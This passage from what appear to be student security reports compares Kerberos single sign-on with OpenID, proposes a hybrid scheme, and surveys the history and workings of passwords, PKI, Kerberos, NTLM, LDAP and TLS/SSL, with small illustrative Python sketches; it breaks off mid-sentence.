─ The user authentication process ends here. From now on, the user can ask for any service without typing in a user name and password; all the verification is done by the client, KDC and SS automatically.
2. Second stage: user ask for service from SS
=======================================================3
 When user ask for a service, the client will send two messages to TGS:
1.
2.
Compose the encrypted TGT and the ID of the requesting
service.
Encrypt clients’ ID and time stamp with client/TGS session key
got from first stage.
 When TGS receive the two messages, it will get the encrypted TGT and
decrypt it with TGS private key. Then TGS get the TGS/Client session
key from TGT. And with this session key, TGS decrypted the second
2
3
Reference:
http://en.wikipedia.org/wiki/Single_sign-on;
Authentication Service for Computer Network.”
“Kerberos:
Processes within “===” are doing by the client, KDC and SS, user will not involve.
166
An
message from client and get client ID with a time stamp. Then it will send
client two messages:
1.
2.
Client-to-Server ticket, this contains the client’s information
and client/server session key. It is encrypted with service
server’s private key.
Client/server session key encrypted with client/TGS session
key.
 Client get the two messages and decrypt the second message with
client/TGS session key and get client/server session key. Upon doing this,
client has enough information to authenticate itself to SS. It send two
messages to SS:
1.
2.
Encrypted client-to-server ticket (the first message got from
TGS)
Client ID, timestamp encrypted with the client/server session
key.
 When the SS receives the two messages from the client, it decrypts the first one using its private key to get the client/server session key. With this session key, the SS can decrypt the second message, which contains the client information and a timestamp. The SS then returns to the client a confirmation message containing timestamp+1, encrypted with the client/server session key.
 When the client receives the confirmation message, it decrypts it with the client/server session key and checks whether the timestamp has been updated. If so, the client can trust the SS and start requesting services.
===================================================
 The server provides the requested service to the client.
─ At this point everything is done, and the user can enjoy the services without entering a username and password again and again.
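The two-stage ticket exchange above can be sketched in Python with a toy symmetric cipher (a SHA-256 keystream XOR standing in for DES/AES; all keys, names and message formats here are illustrative, not the real Kerberos wire format):

```python
import hashlib, json, time

def xor_crypt(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with a SHA-256 keystream. NOT secure."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

# Long-term secrets, established out of band
tgs_key = b"tgs-secret"            # known to the KDC and the TGS
client_key = b"derived-from-pwd"   # known to the KDC and the client

# --- First stage: KDC issues a client/TGS session key and a TGT ---
session_key = b"client-tgs-session"
tgt = xor_crypt(tgs_key, json.dumps(
    {"client": "alice", "key": session_key.hex()}).encode())
msg_for_client = xor_crypt(client_key, session_key)

# Client recovers the session key with its own key (XOR is its own inverse)
recovered = xor_crypt(client_key, msg_for_client)
assert recovered == session_key

# --- Second stage: client sends the TGT plus an authenticator to the TGS ---
authenticator = xor_crypt(recovered, json.dumps(
    {"client": "alice", "ts": int(time.time())}).encode())

# The TGS decrypts the TGT with its own key, then the authenticator
ticket = json.loads(xor_crypt(tgs_key, tgt))
auth = json.loads(xor_crypt(bytes.fromhex(ticket["key"]), authenticator))
print(auth["client"] == ticket["client"])  # True: client verified
```

The key point the sketch shows is that the client never sends its password after the first stage; possession of the session key inside the TGT is what authenticates it.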
2.3
A diagram showing the whole process4
4 Adapted from http://en.wikipedia.org/wiki/File:Kerberos.png. The printer is an example of an SS.
3
OpenID SSO5
3.1
Terminology
 End-user
The end-user is the entity who wants to assert a particular identity, i.e., the OpenID holder.
 Identifier or OpenID
An OpenID is a URL or XRI that the end-user holds to prove the end-user's identity.
 Identity provider or OpenID provider
The OpenID provider, "OP", is the service that provides OpenID registration and authentication, i.e., the end-user gets an OpenID from an OP.
 Relying party
The relying party is the service provider, the site that wants to verify the end-user's identity.
 User-agent
The user-agent is a program used by the end-user to communicate with the relying party and the OpenID provider, typically a web browser implementing HTTP/1.1.
 OP Endpoint URL
The OP Endpoint URL is the URL that accepts OpenID authentication. It is obtained from the OpenID identifier the user enters.
3.2
How does it work?6
 When the end-user wants to log into a site, he/she is presented with a login form.7
 The user responds with the OpenID, i.e., the URL.
 The relying party receives the URL and derives from it the OP endpoint URL.8
5 Reference: "OpenID Authentication 2.0 - Draft 11". http://openid.net/specs/openid-authentication-2_0-11.html
6 Reference: http://www.windley.com/archives/2006/04/how_does_openid.shtml
7 Mostly this login form is a set of buttons such as Google, Yahoo, Facebook, etc.
8 The obtaining process is called "normalization".
 After getting the OP endpoint URL, the relying party communicates with the OP to establish a shared secret using Diffie-Hellman key exchange.9
 The relying party redirects the end-user's browser to the OP with an OpenID authentication request.
 The OP prompts with a window requesting the end-user's name and password to authenticate the end-user.10
 The end-user sends the username and password to the OP server.11
 If the username and password are correct, the end-user has authenticated itself to the OP server. The OP server then returns a form asking the end-user whether or not to trust the relying party.
 The end-user responds to the server.
 Based on the end-user's response, the OP server redirects the user-agent to a URL provided by the relying party.
 The relying party returns the corresponding pages to the end-user according to the URL in the step above.
─ The relying party authentication ends here. If the user's OP username and password are correct and the user chooses to trust the relying party, the user will successfully log in to the relying party's site.
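The shared-secret step mentioned above can be illustrated with a minimal Diffie-Hellman exchange (the modulus and generator here are toy parameters for illustration; real deployments use the standardized groups fixed in the specification):

```python
import secrets

# Public parameters, known to both the relying party (RP) and the OP.
# 2**127 - 1 is a Mersenne prime; real groups are much larger.
p = 2**127 - 1
g = 5

# Each side picks a private exponent and publishes g^x mod p
rp_private = secrets.randbelow(p - 2) + 1
op_private = secrets.randbelow(p - 2) + 1
rp_public = pow(g, rp_private, p)
op_public = pow(g, op_private, p)

# Both sides derive the same shared secret, which becomes the MAC key
# used to sign later assertions; an eavesdropper sees only the publics.
rp_secret = pow(op_public, rp_private, p)
op_secret = pow(rp_public, op_private, p)
assert rp_secret == op_secret
```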
4
Comparison between Kerberos based SSO and OpenID SSO
In this part, I will compare the two implementations of SSO in several ways.
9 This step is optional; if the relying party and the OP have established a connection before, it can be skipped.
10 If the end-user has logged into the server before, this step will be skipped.
11 As above, this step will also be skipped.
4.1
Environment
 Kerberos
Because of the need for a centralized KDC, Kerberos-based SSO is hard to implement on a large scale. The implementation environment is typically a local intranet such as a university, company or hospital.
 OpenID
OpenID is implemented on the Internet, connecting many websites. Currently, OpenID-supporting sites include Google, Facebook, Yahoo, AOL, etc.
─ The implementation environments are quite different for these two SSO technologies, and because of this, the security concerns for the two implementations also differ.
o For Kerberos, the largest drawback is that all the information is stored in the KDC; if the KDC fails, nothing works, which is bad for information availability. However, against other types of attack, such as man-in-the-middle attacks, Kerberos defends itself quite well.
o For OpenID, the most pressing security issue is the man-in-the-middle attack. Earlier versions of OpenID were very weak at protecting against it. In the newest version, the developers introduced techniques such as nonces to defend against the attack, but these still do not solve the problem: a sophisticated attacker can obtain the end-user's identifier and misuse it easily.
4.2
Encryption
 Kerberos
The Kerberos protocol uses Data Encryption Standard (DES) encryption for the communication between the client, SS and KDC. It also uses checksums to ensure integrity.
 OpenID
OpenID supports three signature algorithms:
1. No encryption.
2. HMAC-SHA1 (160-bit key length)12
3. HMAC-SHA256 (256-bit key length)13
─ From the encryption methods, we can see that both implementations have a good enough algorithm to protect the messages and ensure confidentiality. However, for OpenID, we can also see that because it is a new technology, a standard has not been firmly established: relying parties may use different signature algorithms, and some use none at all, which increases the risk of attack.
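The two MAC options listed above can be demonstrated with Python's standard hmac module (the key and the assertion string are illustrative, not the exact OpenID wire format):

```python
import hmac, hashlib

# Association MAC key, e.g. derived from the Diffie-Hellman exchange
mac_key = b"shared-association-key"

# The OP signs the assertion fields it returns to the relying party
assertion = b"openid.claimed_id=https://example.org/alice&openid.nonce=abc123"
sig_sha1 = hmac.new(mac_key, assertion, hashlib.sha1).hexdigest()
sig_sha256 = hmac.new(mac_key, assertion, hashlib.sha256).hexdigest()

# The relying party recomputes the MAC and compares in constant time
expected = hmac.new(mac_key, assertion, hashlib.sha256).hexdigest()
print(hmac.compare_digest(expected, sig_sha256))  # True: assertion untampered
```

Note that these are message-signing (integrity) algorithms rather than encryption: they let the relying party detect tampering, which is exactly the man-in-the-middle concern discussed above.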
4.3
Easy to use?
 Kerberos-based SSO
The set-up of Kerberos-based SSO really makes life easier for users. It achieves the goal of entering a username and password only once, after which the system automatically logs the user in to other independent systems.
 OpenID
As far as I can see, OpenID is not so convenient to use. Although many websites have joined the OpenID standard, most of them still use their own usernames and passwords. Even when users want to log in with an OpenID identifier, they need to copy the URL first (or at least remember it). Some sites provide OpenID provider options for users to log in with, typically Google, Facebook, Yahoo, etc. This makes things easier to some degree, since for a normal user, their account, say a Google account, will usually already be in a logged-in state.
However, OpenID is still a great idea, and I think it will be the right way to log in to websites in the future.
4.4
Any similarities?
I have always wondered whether there are any common points between Kerberos and OpenID, so I have written out their main working flows in a simplified way.
 Kerberos
12 RFC 2104 and RFC 3174
13 RFC 2104 and FIPS 180-2
o User enters username and password.
o KDC authenticates the user.
o User requests a new service from the SS.
o Client (user's machine) goes to the KDC for a ticket.
o Client gets the ticket and sends it to the SS.
o User gets the service.
 OpenID
o User presents a URL to log in to a relying party.
o Relying party goes to the OP to authenticate the user.
o OP prompts a window for username and password.14
o User enters the username and password.
o OP authenticates the user and redirects to the relying party.
o User logs into the relying party.
─ From the above, we can see that Kerberos and OpenID have some similarities. In OpenID, the OP plays the role of the KDC, and the relying party takes over the job of the user's machine in communicating with the OP.
The biggest drawback of Kerberos implementations is the need for a central server to store all the information and process all the requests; if it goes down, everything fails.
OpenID, meanwhile, has difficulty protecting against man-in-the-middle attacks.
So is there any way to combine these two implementations into a better solution?
 My Kerberos OpenID
o The user wants to log in to a relying party through an OP.
o The user agent (the user's browser or machine) checks whether the user is logged into the OP; if not, it prompts the user to log in.
o If yes, the user agent sends the username and the relying party's URL to the OP.
o The OP sends back two messages:
 The first message contains the client's information and a session key, encrypted with the relying party's private key.
 The second message is the session key encrypted using the user's password.
o The client obtains the session key using the user's password, then sends the first message together with a timestamp encrypted with the session key.
o The relying party receives the two messages. It first decrypts the first message to get the session key and the client information, and checks the client information to make sure the client is not anyone else. It then decrypts the timestamp using the session key, updates the value, encrypts it with the session key again and sends it back. At the same time, the relying party can log the user in.
o When the client receives the timestamp, it checks that it is correct. At this stage the client also trusts the relying party.
14 If the user logged in previously, this step would be skipped.
─ Except for the first message, which contains the username, all messages are encrypted with keys. The session key is only valid for a short period. This is very similar to how Kerberos SSO works.
─ Assumptions:
o Every relying party maintains a table containing the private keys shared with each of the OPs.
o Relying parties trust the OPs.
o Users trust the OPs.
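The mutual timestamp check at the heart of the combined scheme can be sketched as follows (an HMAC stands in for the session-key encryption, purely to show the check; the key name and timestamp are illustrative):

```python
import hmac, hashlib

def mac(key: bytes, msg: bytes) -> bytes:
    # Stand-in for encryption: in the scheme above the timestamp would be
    # encrypted with the session key; a MAC suffices to show the check.
    return hmac.new(key, msg, hashlib.sha256).digest()

session_key = b"op-issued-session-key"

# Client sends a timestamp protected by the session key
ts = 1700000000
client_msg = (ts, mac(session_key, str(ts).encode()))

# Relying party verifies the tag, updates the value, and answers with ts + 1
ts_in, tag = client_msg
assert hmac.compare_digest(tag, mac(session_key, str(ts_in).encode()))
reply = (ts_in + 1, mac(session_key, str(ts_in + 1).encode()))

# Client checks the timestamp was updated: now it trusts the relying party too
ts_back, tag_back = reply
assert ts_back == ts + 1
assert hmac.compare_digest(tag_back, mac(session_key, str(ts_back).encode()))
```

Because only a holder of the session key can produce a valid tag over ts + 1, a correct reply proves to the client that it is talking to the genuine relying party, mirroring the timestamp+1 confirmation in Kerberos.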
5
Conclusion
This report has introduced Kerberos-based Single-Sign-On as well as a newer technology called OpenID. I have compared the two in terms of implementation environment and encryption methods, and examined whether they make users' lives easier. Finally, I have sketched a combination of the two, which concludes the report.
6
References
1. http://en.wikipedia.org/wiki/Kerberos_(protocol)
2. B. Clifford Neuman, Theodore Ts'o: "Kerberos: An Authentication Service for Computer Networks."
3. OpenID Authentication 2.0 - Draft 11. http://openid.net/specs/openid-authentication-2_0-11.html#RFC2631
4. http://en.wikipedia.org/wiki/OpenID
5. http://www.windley.com/archives/2006/04/how_does_openid.shtml
A Historical Perspective: An Exploration into the Various
Authentication Methods Used to Authenticate Users and
Systems
Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong, Wei Jie Alex Chui
National University of Singapore, School of Computing
Singapore
Abstract. In this paper, we explore the different and major techniques used
for authenticating various operating systems and users in a historical
perspective. This paper provides an insight using a timeline which gives a
clear illustration on how authentication methods have evolved over time. It
provides an introduction on the history of each of the authentication technique
as well. This paper will also specify on the steps on authenticating users and
systems for each authentication method as well as the limitations for some
authentication methods.
Keywords: Authentication, CA, CP, Encryption, Handshake, Historical, Host-based, IETF, KDC, Kerberos, LDAP, Microsoft Login, MIT, MS-CHAP, NTLM, OS, Open Source, Passwords, PKC, PKI, Private Key, Protocols, Public Key, Rhost, SSH-1, SSH-2, SSL, Third-Party, TLS, Transport Layer, UNIX, Windows, X.500
1
Introduction
Over the years, many different techniques have been used for authentication. Authentication protocols allow a user to access network resources or log on to a domain after the identity of the user is confirmed. With many different techniques available, choosing the appropriate method of authentication for each area becomes the most crucial decision in authenticating users and securing systems. We will look at the various authentication methods below in chronological order.
2
Timeline of Authentication Methods Used on Different
Operating Systems
During the 1980s and 1990s, many new authentication methods emerged, and more improvements were made along the way. The earliest authentication method for users and systems, featured in log-in commands in 1961, was the use of passwords. Later on, passwords improved from mere plaintext passwords to challenge-response passwords. The need for a trusted authority to certify the trustworthiness of public keys spurred the development of Public Key Infrastructure (PKI) in 1969, and the concepts were subsequently released publicly in 1976.
Microsoft's oldest and first ever authentication protocol, known as LAN Manager, was introduced along with Windows 3.11 in 1992 and was primarily used in operating systems earlier than Windows NT 3.1. NTLMv1 and NTLMv2 were successors of LAN Manager and were released in later versions of Windows NT. After the release of Kerberos as open source in 1987, many organizations started to adopt it, including Microsoft. Essentially, Kerberos replaced NTLM as the preferred authentication method in Windows 2000 and beyond.
In 1994, Netscape developed SSL for securing communication sessions; the latest version, TLS 1.2 (SSL 3.3), was released in 2008 and further improved in 2011. In early 1995, a university of technology in Finland was a regular victim of password-sniffing attacks. This prompted one of the researchers at the university to create SSH (version 1) in response, and it was then released to the public as open source.
Next, LDAP is another popular application protocol used for communicating record-based data and maintaining distributed directory information services over a network. LDAP and LDAPv3 came out in 1993 and 1997 respectively. The diagram below illustrates the timeline of the various authentication methods.
Figure 1: Timeline of Various Authentication Methods
3
Authentication Methods Used on Operating Systems
3.1
Passwords
3.1.1 Introduction to Passwords
Passwords are the most basic and most widely used form of authentication. In IT, passwords are commonly used with usernames for better security when accessing things such as accounts and documents. Passwords can be stored either as plaintext or encrypted by various algorithms, and they do not necessarily need to be in the form of words. As passwords rely on secrecy, implementing encryption for passwords is encouraged for better security. However, password authentication is open to several vulnerabilities which can be exploited by methods such as social engineering, password sniffing, man-in-the-middle attacks, dictionary attacks, brute force and birthday-paradox attacks [1].
3.1.2 Passwords from a Historical Perspective
In the context of computing and information technology, the Massachusetts Institute of Technology (MIT) created the first system with a log-in command that prompted the user for a password, in 1961 [2]. In the past, passwords were stored as plaintext in a database on the same server. This was one of the oldest and weakest authentication methods: as passwords were sent in clear text from the clients to the server, anyone who could intercept the connection would be able to retrieve the exact password. The one-way hash function was introduced to improve password security. However, if someone was able to intercept the hashed password during authentication, the password could still be compromised once the hash was deciphered. Therefore, another improvement was added to password security: the use of challenge-response passwords [2].
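The move from plaintext to hashed storage can be illustrated with a salted one-way hash, here PBKDF2 from Python's standard library (the salt size and iteration count are illustrative choices):

```python
import hashlib, hmac, os

def store(password: str) -> tuple[bytes, bytes]:
    """Return (salt, hash); only these are stored, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    # Recompute the hash from the candidate password and compare in
    # constant time; the stored digest cannot be reversed to the password.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)

salt, digest = store("hunter2")
print(verify("hunter2", salt, digest))   # True
print(verify("wrong", salt, digest))     # False
```

The salt ensures that two users with the same password get different stored hashes, and the iteration count slows down the brute-force and dictionary attacks mentioned above.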
3.2
Public Key Infrastructure (PKI)
3.2.1 Introduction to PKI
Public Key Infrastructure (PKI) is based on a third-party trust system. The third party that assures that an individual or other entity is who they claim to be is called a Certificate Authority (CA). The non-repudiation evidence is contained in a digital certificate that has been digitally signed by the CA. Two parties that have no prior relationship with one another can therefore trust each other's identities. One example of this kind of certification is authenticating to a computing resource, whereby a user presents this digital certificate as non-repudiation proof instead of using a password.
A Certificate Policy (CP) assures the communicating parties that they can trust the CA. It also states how the CA establishes identities and how it manages keys and certificates. The CA generates certificates, publishes them, and publishes the revocation lists that are used to reject compromised keys. Current PKI implementations use certificates based on the X.509 v3 standard for interoperability between implementations [3]. PKI supports the use of public-key encryption on an insecure public network such as the Internet to exchange data securely and privately. It assumes the use of public and private cryptographic key pairs obtained and shared through a trusted authority, used for authenticating a message sender or encrypting a message [4].
3.2.2 PKI from a Historical Perspective
The concepts behind Public Key Infrastructure were developed in 1969 by Ellis and other British scientists at GCHQ [5]. Whitfield Diffie and Martin Hellman of Stanford University and Ralph Merkle of the University of California at Berkeley were the first researchers to publicly disclose the concepts of PKI, with Public Key Cryptography (PKC), in their 1976 paper "New Directions in Cryptography".
The Diffie-Hellman-Merkle public/private key exchange algorithm also paved the way for secure public key distribution, although it did not implement digital signatures. A year later, Ronald L. Rivest, Adi Shamir and Leonard M. Adleman, a team of mathematicians from MIT, found a way to apply Diffie and Hellman's theories in a real-world context and named their encryption method RSA, after the initials of their names. RSA is based on multiplying prime numbers to form a large number that is difficult to factor. It is therefore hard to crack, exactly fitting the requirements for a practical public-key cryptography implementation [6].
3.2.3 Public Key Cryptography/Public-Key Encryption
Public-key cryptography is based on extremely complex mathematical problems and uses two keys, a public key and a private key. The private key is used for decrypting messages and for signing; the public key is used for encrypting messages and for verifying signatures. Public keys are made available to the public and are published in public directories on the Internet for easy retrieval. This is one of the advantages of public-key cryptography, and it also eases key management. With the public key disclosed on the Internet, its integrity is critical; it is assured by the completion of a certification process by a certification authority (CA). Once the public key is certified, the CA signs it digitally, so that relying parties can trust that it is certified. Both the private and public keys are created concurrently, using the same algorithm, by the CA. The private key is issued to the requesting party, while the public key can be accessed from a public directory by all parties [7]. The private key is never shared or sent to anybody across the Internet; it is used for decrypting texts that have been encrypted with the corresponding public key. Thus, users can look up a public key from a central administrator or an online public directory and use it to encrypt a message; upon reception, the message is decrypted with the receiver's private key. In addition to decrypting messages, the private key ensures non-repudiation: it is used to sign a digital certificate, and when a message is sent with the signed digital certificate, the signature can be verified with the sender's public key [4]. Here is a table that summarizes this:
Task                                                          | Whose key?     | Which key?
Send an encrypted message                                     | the receiver's | public key
Send an encrypted signature                                   | the sender's   | private key
Decrypt an encrypted message                                  | the receiver's | private key
Decrypt an encrypted signature (and authenticate the sender)  | the sender's   | public key
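The four rows above can be checked with a textbook-sized RSA key pair (tiny primes, for illustration only; real keys are 2048 bits or more):

```python
# Textbook RSA with the classic toy parameters p=61, q=53
p, q = 61, 53
n = p * q                 # modulus 3233, part of both keys
e = 17                    # public exponent
d = 2753                  # private exponent: (e * d) % lcm(p-1, q-1) == 1

m = 65                    # a message, encoded as a number < n

# Encrypt with the receiver's public key; decrypt with the private key
c = pow(m, e, n)
assert pow(c, d, n) == m

# Sign with the sender's private key; verify with the public key
s = pow(m, d, n)
assert pow(s, e, n) == m
```

Security rests on the difficulty of recovering d from (n, e), which would require factoring n; with 61 and 53 that is trivial, but with primes of hundreds of digits it is infeasible, exactly as the paragraph above describes.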
3.3
Kerberos
3.3.1 Introduction to Kerberos
Kerberos was developed based on the Needham-Schroeder authentication protocol; it is a trusted third-party authentication service that provides authentication on an open network. All clients that use Kerberos trust its judgment in identifying each of the other clients, which is why it is called trusted. Timestamps were added to the original Needham-Schroeder model to check for replays, as a message could be stolen from the network and resent later [8].
3.3.2 Kerberos from a Historical Perspective
The Massachusetts Institute of Technology (MIT) started the development of Kerberos in 1983 as part of Project Athena, and it became an IETF standard in 1993. Since MIT released Kerberos as open source in 1987, many organizations have adopted it. Kerberos is a popular network authentication protocol used by Microsoft, Apple, Red Hat, Sun and many more [9]. Windows 2000 and Windows XP use Kerberos as their default authentication method for two underlying reasons: Kerberos is open source, allowing Microsoft to create its own extensions for Microsoft's applications, and Kerberos is reliable for network authentication [10]. Kerberos authentication replaced NTLM as the preferred authentication protocol in the Active Directory-based single sign-on scheme for Windows 2000 and above.
3.3.3 How does the Kerberos protocol work?
Kerberos holds a database of its clients and their secret keys; each secret key is known only to Kerberos and the client it belongs to. If the client happens to be a user, the secret key is derived from his password. Both network services and clients have to register with Kerberos before they can use its services, and the secret key is negotiated during registration. Since Kerberos holds the clients' secret keys, it can convince one client of the identity of another, and it creates session keys for the transmission of messages between two clients [8]. The steps below show how Kerberos works:
1) First, the client sends a request to the authentication service (AS), which verifies the client by looking up the client's ID in its database. Next, the AS creates a session key (SK1) and encrypts it with the client's secret key. The AS then creates a ticket-granting ticket (TGT) encrypted with the ticket-granting server's (TGS) secret key.
2) The client decrypts the message to get the session key and uses it to create an authenticator. The client sends both the authenticator and the TGT to the TGS to request access to the target server. The TGS decrypts the TGT to obtain the session key, then uses it to decrypt the authenticator and verify the client. After verification, the TGS creates a new session key (SK2), encrypted with SK1, along with a session ticket encrypted with the service server's secret key.
3) The client then creates an authenticator using SK2 and sends it to the service server along with the session ticket. For applications that require two-way authentication, the service server sends back a message encrypted with SK2, completing the authentication.
4) Lastly, both the client and server use a symmetric key, which they both know through the authentication, for transmitting data [11].
3.3.4 Kerberos Weaknesses
Even after several versions of Kerberos have been published, Kerberos is still plagued by some weaknesses.
a) Replay Attacks
In Kerberos Version 4, even with the inclusion of a timestamp in the authenticator, it is still possible, if difficult, to perform a replay attack. The replay cache was therefore introduced in Kerberos Version 5 to prevent such attacks: authenticators are stored on the servers so that the servers can reject replicas. However, if an attacker is able to copy the ticket and authenticator and send them to the application server before the user sends his real request, the attacker can use the service [12].
b) Password Guessing Attacks
This attack is not yet resolved in Kerberos Version 5 [14]. An attacker can intercept one of the Kerberos tickets; as the ticket is encrypted with a key based on the client's password, the attacker may perform a brute-force attack to decrypt the ticket. If successful, the attacker discovers the client's password in the process [13].
c) Single Point of Failure
The Key Distribution Centre (KDC) is required to be available at all times. If the KDC is down, no one will be able to log in or use the services. However, this can be resolved by having more than one Kerberos server [13].
3.4
NTLM
3.4.1 Introduction to NTLM
NTLM is used in various Microsoft network protocol implementations as a suite of Microsoft security protocols providing authentication, integrity and confidentiality to users. Microsoft systems use NTLM as an integrated single sign-on mechanism, using the credentials obtained during the interactive logon process, which consist of a domain name, a user name, and a hash of the user's password [15].
There are two different types of NTLM authentication. One is interactive NTLM authentication, where authentication takes place between the domain controller and the client, and the user has to provide his logon details during the process. The other is non-interactive NTLM authentication, where a user who is already logged on does not have to log on interactively again to gain access to different resources on the server [16].
3.4.2 NTLM from a Historical Perspective
NTLM was the default network authentication protocol for Windows NT 4.0 and earlier Windows operating systems, and was replaced by Kerberos as the standard in Windows 2000 [15]. NTLM provides three different challenge-response authentication methods whose main difference is their level of encryption.
 LAN Manager (LM): LM is the first form of these secured authentication protocols, introduced along with Windows 3.11 [18]. LM authentication provides the weakest encryption and is considered the least secure of the three [19].
 NTLM Version 1: NTLMv1 replaced LM authentication and is a more secure form of authentication, as it uses 56-bit encryption and stores user credentials as NT hashes [19]. NTLMv1 was introduced in Windows NT 3.1 [18].
 NTLM Version 2: NTLMv2 was later released to replace NTLMv1 and was introduced in Windows NT Service Pack 4. It is the latest version of NTLM and currently the most secure of these challenge-response authentication methods, as it uses 128-bit encryption [19]. It is supported by all versions of Windows from NT SP4 onwards [20]. Windows Vista and newer versions of Windows use NTLMv2 as a fallback authentication in situations where Kerberos cannot be used. The protocol remains supported in Windows 2000 and above even though it has been replaced by Kerberos as the default [17].
3.4.3 How does NTLM work?
NTLM uses a challenge-response authentication method to allow clients to authenticate to the server without sending their password in plaintext [14]. The NTLM challenge-response mechanism consists of three messages, known as negotiation, challenge and authentication.
The following steps illustrate the NTLM authentication process. Of the two types of authentication, interactive and non-interactive, that form part of the NTLM integrated single sign-on mechanism, only Step 1 occurs in the interactive authentication process:
1. First, the user enters a domain name, username and password into a client computer. The computer then computes a cryptographic hash of the password and discards the plaintext password.
2. The client sends the username, in plaintext, to the server.
3. The server generates a 16-byte random number, the challenge, and sends it to the client.
4. The client encrypts the challenge with the hash of the user's password and sends the result to the server as its response.
5. The server forwards the username, the challenge sent to the client, and the response received from the client to the domain controller.
6. The domain controller uses the username to obtain the hash of the user's password from the Security Account Manager database and uses it to encrypt the challenge.
7. Finally, the domain controller compares its encrypted challenge from Step 6 to the response given by the client. Authentication succeeds if they are the same [16].
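The seven steps above can be sketched as follows (HMAC-SHA256 stands in for the MD4/DES-based computations of real NTLM, and all names and values are illustrative):

```python
import hmac, hashlib, os

def response(pwd_hash: bytes, challenge: bytes) -> bytes:
    # Stand-in for NTLM's DES-based computation over the challenge
    return hmac.new(pwd_hash, challenge, hashlib.sha256).digest()

# Step 1: client hashes the password and discards the plaintext
pwd_hash = hashlib.sha256("s3cret".encode("utf-16-le")).digest()

# Step 3: server generates a 16-byte random challenge
challenge = os.urandom(16)

# Step 4: client answers with a function of the hash and the challenge;
# the password itself never crosses the network
client_resp = response(pwd_hash, challenge)

# Steps 5-7: the domain controller, which stores the same hash,
# recomputes the response and compares
dc_hash = hashlib.sha256("s3cret".encode("utf-16-le")).digest()
authenticated = hmac.compare_digest(client_resp, response(dc_hash, challenge))
print(authenticated)  # True
```

A fresh random challenge per session is what prevents an eavesdropper from simply replaying an old response.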
3.5
Lightweight Directory Access Protocol (LDAP)
3.5.1 Introduction to LDAP
LDAP is a popular application protocol used for communicating record-based data and maintaining distributed directory information services over a network. LDAP is based on a simpler standard than X.500. The directory services provide a set of records in a hierarchical structure, such as an email directory. LDAP is mostly used in UNIX for authentication and is found in many other business environments.
3.5.2 LDAP from a Historical Perspective
In its early engineering stages, it was known as the Lightweight Directory Browsing Protocol (LDBP). LDAP was created by Tim Howes, Yeong Wengyik and Steve Kille in 1993; LDAPv3 was published in 1997 through the work of Tim Howes and Steve Kille. To understand LDAP from a historical perspective, we need to consider the Directory Access Protocol (DAP) and X.500, from which it is derived [21]. In X.500, the Directory System Agent (DSA) is hierarchical in form and provides efficient, fast searching and retrieval. The Directory User Agent (DUA) provides functionality that can be implemented in all sorts of user interfaces through dedicated DUA clients, email applications or web server gateways [21]. DAP is used in X.500 services for controlling communications between DSA and DUA agents. LDAP is a subset of the X.500 protocol, and its clients are easier to implement and faster than X.500 clients. Active Directory supports access via LDAP from any LDAP-enabled client, though it is not a pure X.500 directory [21]. Active Directory uses LDAP as its access protocol and supports the X.500 information model without requiring systems to host the entire X.500 overhead [21]. By combining LDAP, the best of the X.500 naming standards and a rich set of APIs, Active Directory enables a single point of administration for all resources [21].
3.5.3 How does LDAP work?
LDAP works on a client/server model and provides operations such as Bind, Search, Compare and Update. LDAP's authentication is supplied by the Bind operation, which establishes the authentication state for a connection and sets the LDAP protocol version. An LDAP client must first authenticate itself to the LDAP service by connecting to the LDAP server (known as a DSA) on TCP port 389 and sending an operation request. An LDAP client that sends a request without a Bind is treated as an anonymous client [22]. The LDAP client must indicate to the LDAP server who is going to access the data, so that the server can decide what the client may see and do; this is known as access control. The server then responds with the answer, or with a pointer to another LDAP server where the client can obtain more information [22]. Clients do not need to wait for a response before sending the next request and may send requests in any order, and the same applies to the server's responses.
3.5.4 Limitations of LDAP
Depending on the versions of the Name Service Switch (NSS), Pluggable Authentication Modules (PAM) and LDAP, users might not be allowed to change their passwords [23]. Next, there is a possibility that the system displays only a user ID (UID), because UNIX and Linux clients might not be able to recognize users when commands such as ls or id are used [23]. Lastly, some desktop environments are not able to query LDAP directories correctly; as a result, users may find that GUI environments do not work as expected.
3.6
Transport Layer Security (TLS) and Secure Sockets Layer (SSL)
3.6.1 Introduction to TLS/SSL
Transport Layer Security (TLS) and Secure Sockets Layer (SSL) are public key
cryptographic protocols developed for securing web browsing and other
communication sessions. They protect network connections by using a keyed
message authentication code for message integrity and asymmetric cryptography for
key establishment and privacy. TLS/SSL provides authentication of servers, and
optionally of clients, through the use of cryptography and digital certificates. The
specification was designed so that other application layer protocols such as LDAP,
FTP and TELNET can also use SSL for their communications. TLS/SSL offers
strong authentication, message privacy and integrity to servers and clients, and is
mainly used to prevent man-in-the-middle, replay and masquerade attacks [24]. It is
implemented on top of a reliable transport layer protocol, typically TCP.
3.6.2 TLS/SSL from a Historical Perspective
Secure Sockets Layer (SSL) was developed by Netscape in 1994 to secure transactions
over the Internet. SSL Version 1.0 was never released to the public. In February
1995, SSL Version 2.0 was released, but it contained several security flaws, and SSL
Version 3.0 came out in 1996 to replace it. In January 1999, TLS 1.0 (sometimes
called SSL 3.1) was released as an upgrade to SSL Version 3.0; the two are not
interoperable, so the parties must negotiate a common protocol version if they do not
both support the same one. In April 2006, TLS 1.1 (SSL 3.2) was released with
additional protection against Cipher Block Chaining (CBC) attacks. In August 2008,
TLS 1.2 (SSL 3.3) was released, adding Advanced Encryption Standard cipher suites
and a definition of TLS extensions; its backward compatibility with SSL was further
revised in March 2011. TLS provides several security improvements over SSL, such
as Keyed-Hashing for Message Authentication Code (HMAC), consistent certificate
handling and specific alert messages [25]. Due to its ease of deployment and use, it
became a popular authentication method in Windows, and it works with most web
browsers and operating systems, including Windows and UNIX.
3.6.3 How does TLS/SSL work?
The TLS/SSL protocol can be divided into two layers. The first layer consists of the
Handshake Protocol, the Change Cipher Spec Protocol and the Alert Protocol,
running above the second layer, the Record Protocol. The Record Protocol is
responsible for controlling the flow of data between the two end points of a session;
symmetric ciphers such as Triple Data Encryption Standard (3DES) are used for
encryption. The Handshake Protocol authenticates one or both endpoints of the
session and then establishes a unique symmetric secret from which the keys for
